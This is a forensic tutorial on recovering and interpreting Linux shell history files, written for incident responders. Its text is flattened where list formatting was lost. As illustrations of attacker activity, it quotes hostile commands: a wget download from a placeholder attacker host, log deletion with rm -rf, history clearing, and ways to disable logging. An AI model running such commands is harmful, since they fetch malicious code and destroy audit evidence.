By default, Linux systems log interactive terminal commands to provide users with operational convenience (the ability to recall previous commands). In a post-mortem forensic context (e.g., analyzing a mounted disk image at /mnt/analysis/), these files are absolute goldmines.
The artifact is always located at the root of the user’s home directory:
/root/.bash_history/home/<username>/.bash_history/var/www/ for www-data).Understanding how Bash writes to disk is crucial for accurate timeline reconstruction. Bash does not write to the .bash_history file in real-time.
.bash_history file and loads it into memory..bash_history file on disk when the terminal session is gracefully closed (e.g., typing exit or logging out).When parsing .bash_history, DFIR analysts look for specific sequential patterns that map to the MITRE ATT&CK framework.
whoami, id, uname -a, cat /etc/issue, netstat -antp, or ps aux to understand the environment.wget http://attacker.com/malware, curl -O, or git clone.chmod +x malware), executing binaries (./malware), or unpacking archives (tar -xvf rootkit.tar).rm -rf /var/log/*), securely shredding files (shred config.php), or clearing the current session history (history -c).Attackers often pivot to other interactive tools that maintain their own hidden history files. Investigators must thoroughly scan user directories for these alternative artifacts:
Alternative Shells
Zsh (.zsh_history): The default shell on macOS and Kali Linux. Often found on developer workstations.
Python (.python_history): Records interactive Python shell commands, often used by attackers to spawn reverse shells or manipulate local data.
Interactive Applications
Database Clients (.mysql_history, .psql_history): Can reveal SQL injection testing, data exfiltration queries, or clear-text passwords.
Text Editors (.viminfo, .nano_history): These artifacts document file modifications and can even contain search/replace strings used by the attacker to backdoor configuration files.
Because .bash_history is highly incriminating, it is usually the first artifact an attacker attempts to neutralize.
A common technique is deleting the history file and creating a symbolic link to /dev/null.
Execution of ls -la /root/.bash_history will reveal .bash_history -> /dev/null. Consequently, no commands will ever be written to disk.
If the command export HISTFILESIZE=0 or export HISTSIZE=0 is injected into the .bashrc or .profile files, the system is instructed to retain zero lines of history.
By default, many Linux distributions configure HISTCONTROL=ignorespace. This built-in feature dictates that if an attacker begins a command with a leading Space character (e.g., ./malware), the command bypasses the history buffer entirely. This is a severe limitation of the artifact.
To maximize the value of shell history, analysts must adopt a holistic approach.
root user. If a web application is compromised, the history file of the www-data or jenkins user may contain the initial web shell commands or reverse shell executions.HISTTIMEFORMAT variable, the .bash_history file will contain Unix epoch timestamps (preceded by a #) before each command, which is invaluable for timeline generation.auth.log or secure). If an SSH login from a malicious IP occurs at 14:00 and disconnects at 14:10, the cluster of commands at the end of the .bash_history file likely corresponds to that specific session.